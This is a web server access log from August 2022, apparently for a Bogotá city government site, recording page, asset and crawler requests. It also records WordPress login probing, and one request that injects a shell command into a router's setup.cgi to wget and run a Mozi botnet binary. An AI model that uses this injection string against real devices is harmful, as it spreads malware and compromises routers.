185.119.81.105 - - [14/Aug/2022:12:08:52 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [14/Aug/2022:12:08:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:12:09:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [14/Aug/2022:12:12:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:12:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:12:14:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:12:15:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50790
172.22.2.4 - - [14/Aug/2022:12:16:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [14/Aug/2022:12:16:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [14/Aug/2022:12:17:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:17:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
186.31.216.33 - - [14/Aug/2022:12:18:35 -0500] "GET /forest/ HTTP/1.1" 200 12041
200.118.60.145 - - [14/Aug/2022:12:18:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
200.118.60.145 - - [14/Aug/2022:12:18:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.60.145 - - [14/Aug/2022:12:18:55 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
200.118.60.145 - - [14/Aug/2022:12:18:55 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
186.31.216.33 - - [14/Aug/2022:12:18:56 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
200.118.60.145 - - [14/Aug/2022:12:18:56 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
200.118.60.145 - - [14/Aug/2022:12:18:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
200.118.60.145 - - [14/Aug/2022:12:18:58 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
173.252.95.3 - - [14/Aug/2022:12:20:02 -0500] "GET /si-tienes-entre-14-y-25-anos-y-quieres-participar-inscribete-a-la-convocatoria-de-lideres-juveniles-para-la-cumbre-de-alcaldes-c40-2022.html HTTP/1.1" 206 1141
201.245.192.253 - - [14/Aug/2022:12:20:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43210
201.245.192.253 - - [14/Aug/2022:12:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48462
172.22.2.4 - - [14/Aug/2022:12:20:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2022:12:22:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:22:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:12:21:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
212.102.41.36 - - [14/Aug/2022:12:23:10 -0500] "GET /wp-login.php HTTP/1.1" 404 1035
172.22.2.4 - - [14/Aug/2022:12:23:11 -0500] "GET /BLA/boletinlegal/wp-login.php HTTP/1.1" 404 1038
185.119.81.105 - - [14/Aug/2022:12:25:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [14/Aug/2022:12:25:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.65 - - [14/Aug/2022:12:27:05 -0500] "GET /bla/resoluciones/notificaciones/autos%202020/3254.pdf HTTP/1.1" 200 355231
216.245.221.92 - - [14/Aug/2022:12:27:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:27:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:12:26:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:12:27:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
157.55.39.50 - - [14/Aug/2022:12:29:45 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
201.245.192.253 - - [14/Aug/2022:12:30:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43210
201.245.192.253 - - [14/Aug/2022:12:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48462
216.245.221.92 - - [14/Aug/2022:12:32:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:32:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:12:32:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:12:32:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
66.220.149.120 - - [14/Aug/2022:12:34:56 -0500] "GET /esta-abierta-la-convocatoria-para-ser-parte-del-programa-de-voluntariado-ambiental-de-bogota.html HTTP/1.1" 206 972
173.231.60.194 - - [14/Aug/2022:12:36:33 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Aug/2022:12:37:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:37:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
40.77.167.65 - - [14/Aug/2022:12:38:34 -0500] "GET /bla/resoluciones/autos%202022/1313.pdf HTTP/1.1" 200 450313
172.22.2.4 - - [14/Aug/2022:12:37:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:12:40:14 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2022:12:40:14 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2022:12:40:14 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [14/Aug/2022:12:40:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [14/Aug/2022:12:40:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Aug/2022:12:40:15 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [14/Aug/2022:12:40:16 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [14/Aug/2022:12:40:23 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [14/Aug/2022:12:40:23 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [14/Aug/2022:12:40:23 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [14/Aug/2022:12:40:23 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [14/Aug/2022:12:40:23 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/Aug/2022:12:38:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
201.245.192.253 - - [14/Aug/2022:12:40:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43210
172.22.2.4 - - [14/Aug/2022:12:40:31 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
201.245.192.253 - - [14/Aug/2022:12:40:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48462
23.100.232.233 - - [14/Aug/2022:12:41:51 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
23.100.232.233 - - [14/Aug/2022:12:41:51 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
23.100.232.233 - - [14/Aug/2022:12:41:51 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
23.100.232.233 - - [14/Aug/2022:12:41:51 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
23.100.232.233 - - [14/Aug/2022:12:41:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
23.100.232.233 - - [14/Aug/2022:12:41:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
23.100.232.233 - - [14/Aug/2022:12:41:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
23.100.232.233 - - [14/Aug/2022:12:41:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
23.100.232.233 - - [14/Aug/2022:12:41:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
23.100.232.233 - - [14/Aug/2022:12:41:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
172.22.2.4 - - [14/Aug/2022:12:40:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62371
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
23.100.232.233 - - [14/Aug/2022:12:41:53 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
23.100.232.233 - - [14/Aug/2022:12:41:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
23.100.232.233 - - [14/Aug/2022:12:41:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
23.100.232.233 - - [14/Aug/2022:12:41:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
23.100.232.233 - - [14/Aug/2022:12:41:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
23.100.232.233 - - [14/Aug/2022:12:41:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
23.100.232.233 - - [14/Aug/2022:12:41:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
23.100.232.233 - - [14/Aug/2022:12:41:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
23.100.232.233 - - [14/Aug/2022:12:41:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
23.100.232.233 - - [14/Aug/2022:12:41:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
23.100.232.233 - - [14/Aug/2022:12:41:56 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
23.100.232.233 - - [14/Aug/2022:12:41:56 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
216.245.221.92 - - [14/Aug/2022:12:42:21 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.100 - - [14/Aug/2022:12:42:39 -0500] "-" 408 -
201.245.192.253 - - [14/Aug/2022:12:42:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
181.204.226.82 - - [14/Aug/2022:12:43:54 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.204.226.82 - - [14/Aug/2022:12:43:56 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.204.226.82 - - [14/Aug/2022:12:43:56 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.204.226.82 - - [14/Aug/2022:12:43:56 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.204.226.82 - - [14/Aug/2022:12:43:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.204.226.82 - - [14/Aug/2022:12:43:56 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.204.226.82 - - [14/Aug/2022:12:44:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 3595
181.204.226.82 - - [14/Aug/2022:12:44:01 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
181.204.226.82 - - [14/Aug/2022:12:44:02 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
181.204.226.82 - - [14/Aug/2022:12:44:02 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.204.226.82 - - [14/Aug/2022:12:44:12 -0500] "POST /appsia/controlador HTTP/1.1" 200 3599
181.204.226.82 - - [14/Aug/2022:12:44:12 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
40.77.167.65 - - [14/Aug/2022:12:44:14 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
181.204.226.82 - - [14/Aug/2022:12:44:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
40.77.167.31 - - [14/Aug/2022:12:44:16 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
40.77.167.65 - - [14/Aug/2022:12:44:16 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
207.46.13.20 - - [14/Aug/2022:12:44:17 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
40.77.167.31 - - [14/Aug/2022:12:44:18 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
157.55.39.84 - - [14/Aug/2022:12:44:19 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
207.46.13.188 - - [14/Aug/2022:12:44:19 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
40.77.167.31 - - [14/Aug/2022:12:44:21 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
157.55.39.84 - - [14/Aug/2022:12:44:22 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
181.204.226.82 - - [14/Aug/2022:12:44:30 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
181.204.226.82 - - [14/Aug/2022:12:44:30 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.204.226.82 - - [14/Aug/2022:12:44:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 7729
181.204.226.82 - - [14/Aug/2022:12:44:34 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [14/Aug/2022:12:43:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:12:46:12 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
172.22.2.4 - - [14/Aug/2022:12:44:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
40.77.167.65 - - [14/Aug/2022:12:46:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2024.pdf HTTP/1.1" 200 625682
3.238.252.196 - - [14/Aug/2022:12:45:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
185.7.214.117 - - [14/Aug/2022:12:47:18 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Aug/2022:12:47:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:47:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:12:48:05 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2022:12:48:05 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2022:12:48:05 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [14/Aug/2022:12:48:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [14/Aug/2022:12:48:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Aug/2022:12:48:06 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/Aug/2022:12:48:08 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
49.143.32.6 - - [14/Aug/2022:12:48:08 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [14/Aug/2022:12:48:09 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/Aug/2022:12:48:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.204.226.82 - - [14/Aug/2022:12:48:42 -0500] "GET /appsia/controlador HTTP/1.1" 200 4621
181.204.226.82 - - [14/Aug/2022:12:48:42 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
